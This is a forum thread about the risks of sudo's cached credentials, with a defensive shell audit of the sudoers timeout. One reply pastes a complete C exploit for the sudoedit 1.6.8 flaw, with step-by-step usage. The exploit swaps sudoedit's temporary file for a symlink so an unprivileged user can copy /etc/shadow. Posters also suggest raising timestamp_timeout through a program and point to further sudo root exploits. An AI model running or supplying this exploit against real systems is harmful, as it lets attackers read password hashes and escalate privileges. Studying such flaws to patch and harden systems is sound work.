Topic: sudo is dangerous :D

I started to write something for Linux and I must admit that the danger of sudo is alarming. After entering your password, it remains active for several minutes (if they do not change the configuration file), so I may well change the permissions of a file and run it as if I were root. You can play as well with syscalls:
sys_chmod
sys_lchown
sys_kill
sys_umask
sys_reboot
etcetc

sudo is used (badly) by *buntu, the most used distro in the world.
What do you think?

Sorry for my bad English

Last edited by Mani_Rosse (2011-03-04 00:32:46)

Sardigna Indipendentzia

0

Re: sudo is dangerous :D

Privilege escalation vulnerabilities are always nice to find, though I believe this affects sudo version 1.6.8 only, if I'm thinking about the same vulnerability in the "sudo -u" option giving an attacker read permissions?

Motto: It's good to be bad, but it's even better to be evil.
Troll Food: Even clever posts to trolls are still troll food.
Advice: Never argue with an idiot; they will drag you down to their level and then beat you with experience.
Question: If the truth is out there? Does anyone know the URL?

+1

Re: sudo is dangerous :D

The danger is the "admin" group to which the same user belongs, so you just enter the password once and the program is free to do what it wants (even change the permissions).
system ("sudo chown ...");
execlp ("sudo", "sudo", .....);
etc., etc.

@TehCAKE
      -u user     The -u (user) option causes sudo to run the specified
                   command as a user other than root.  To specify a uid
                   instead of a user name, use #uid.  When running commands as
                   a uid, many shells require that the '#' be escaped with a
                   backslash ('\').  Note that if the targetpw Defaults option
                   is set (see sudoers(5)) it is not possible to run commands
                   with a uid not listed in the password database.

#> vi /etc/sudoers
Defaults        env_reset, timestamp_timeout=0 <--- This changes the password caching time

If set to 0, the password is always required, but what if it is changed to 300? wink
Writing a program that modifies this file is very simple; you only have to enter the password once.

Last edited by Mani_Rosse (2011-03-05 12:48:26)

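As an added example (not code from the thread), a small POSIX shell audit that reads a sudoers file the way the post above edits it, reports the effective timestamp_timeout (the last global Defaults line wins; sudoers(5) documents 5 minutes as the compiled-in default when nothing sets it) and states the risk of that value; the sudoers text below is constructed for the demo.

```shell
#!/bin/sh
# Added example: audit the sudo credential-cache timeout in a sudoers file.
# The sample input is constructed here, not a real system file.
SAMPLE_SUDOERS='Defaults        env_reset
Defaults        mail_badpass
Defaults        timestamp_timeout=15
# hardened: always ask, as the post above recommends
Defaults        env_reset, timestamp_timeout=0
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
'

# effective_timeout FILE
# Print the timestamp_timeout set by global "Defaults" lines in FILE; when
# several lines set it, the last one wins. If none sets it, print the
# sudoers(5) compiled-in default of 5 minutes. Per-user/host Defaults
# (Defaults:user, Defaults@host) are deliberately not considered here.
effective_timeout() {
    value=$(sed -n 's/^Defaults[[:space:]].*timestamp_timeout=\(-\{0,1\}[0-9.][0-9.]*\).*/\1/p' "$1" | tail -n 1)
    if [ -n "$value" ]; then
        echo "$value"
    else
        echo 5
    fi
}

# describe_timeout MINUTES: one-line risk statement for the value found
describe_timeout() {
    case "$1" in
        -1) echo "never expires: one password unlocks sudo until the session ends" ;;
        0)  echo "password required for every sudo invocation" ;;
        *)  echo "cached for $1 minutes: any process running as that user can run sudo without a prompt" ;;
    esac
}

# demo: write the constructed sample to a temp file and report on it
demo() {
    f=$(mktemp)
    printf '%s' "$SAMPLE_SUDOERS" > "$f"
    t=$(effective_timeout "$f")
    echo "timestamp_timeout=$t -> $(describe_timeout "$t")"
    rm -f "$f"
}

demo
```

Point effective_timeout at /etc/sudoers on a real host to check whether the setting the post recommends is actually in place.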

Re: sudo is dangerous :D

Mani_Rosse wrote:

I started to write something for Linux and I must admit that the danger of sudo is alarming. After entering your password, it remains active for several minutes (if they do not change the configuration file), so I may well change the permissions of a file and run it as if I were root. You can play as well with syscalls:
sys_chmod
sys_lchown
sys_kill
sys_umask
sys_reboot
etcetc

sudo is used (badly) by *buntu, the most used distro in the world.
What do you think?

Sorry for my bad English

All I get is that sudo is dangerous because it lasts some minutes...

Everything is just a matter of time.

Re: sudo is dangerous :D

@Mani_Rosse You might find this exploit a useful resource for ideas.

Code:

/*

       Copyright © Rosiello Security 2004
            http://www.rosiello.org

                 sudoedit Exploit


SOFTWARE : sudoedit
REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
DATE: 18/09/2004

Summary:
A flaw exists in sudo's -u option (aka sudoedit)
in sudo version 1.6.8 that can give an attacker
read permission to a file that would otherwise be
unreadable.

Sudo versions affected:
1.6.8 only

Credit:
Reznic Valery discovered the problem.

-----------------------------------------------------------

All the information that you can find in this software
was published for educational and didactic purposes only.
The author published this program under the condition
that it is not the intention of the reader to use it
in order to bring himself or others a profit or to bring
damage to others.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open with it the
file "rosiello" as shown in the example.

EXAMPLE SCENARIO:

1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo rosiello org

*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>   /* wait() */
#include <fcntl.h>
#include <dirent.h>
#include <unistd.h>     /* fork(), execl() */


int main( int argc, char *argv[] )
{
    char PATH[]="/usr/tmp";
    char file[64];      /* room for PATH + "/" + a name of up to 24 chars */
    DIR *tmp;
    struct dirent *de;
    int found = 0;

    printf( "Copyright © Rosiello Security 2004\n" );
    printf( "http://www.rosiello.org\n" );

    if( argc!=2 )
    {
        printf( "USAGE: %s file\n", argv[0] );
        return( 0 );
    }

    tmp = opendir( PATH );
    if( tmp == NULL )
    {
        perror( PATH );
        return( 1 );
    }

    /* look for the temporary copy that sudoedit 1.6.8 keeps in /usr/tmp */
    while ( (de = readdir ( tmp ))!= NULL )
    {
        if ( strstr(de->d_name, "rosiello") != NULL )
        {
            if( strlen(de->d_name) > 24 ) return( 0 );
            snprintf( file, sizeof(file), "%s/%s", PATH, de->d_name );
            remove( file );
            if( fork()!=0 )
            {
                /* parent replaces the temp file with a symlink to argv[1] */
                execl( "/bin/ln", "ln", "-s", argv[1], file, (char *)NULL );
            }
            wait( NULL );
            printf( "Now you can close sudoedit and reopen rosiello!\n" );
            found=1;
            goto end;
        }
    }
    end:
    closedir( tmp );

    if( !found )
        printf( "File Not Found!\n" );
    return( 0 );
}

Source: SudoEdit 1.6.8 Local Change Permission Exploit

Reference: CVE-2010-0426
Reference: CVE-2010-1163


Re: sudo is dangerous :D

Thanks TehCAKE. For me, at my first post, karma -1?? sad I'm a newbie...

Last edited by Mani_Rosse (2011-03-05 21:48:54)


Re: sudo is dangerous :D

Mani_Rosse wrote:

Thanks TehCAKE

Always a pleasure, Mani. Your post sparked my own interest in sudo vulnerabilities; for further sudo exploits I would keep an eye on [link] and/or [link], though most get patched pretty quickly.

I also found these, which you may find interesting resources (some are out-dated but may still be of use):
Sudo Off-by-One POC Exploit
Todd Miller Sudo Local root Exploit
Flaw in Runas Group Password Checking

Mani_Rosse wrote:

For me at first post karma -1

Yeah, I don't quite get that! sad

Last edited by TehCAKE (2011-03-06 08:04:34)


Re: sudo is dangerous :D

Yes, I always set the sudo timeout to 0; I think that should be made the default for all major distros.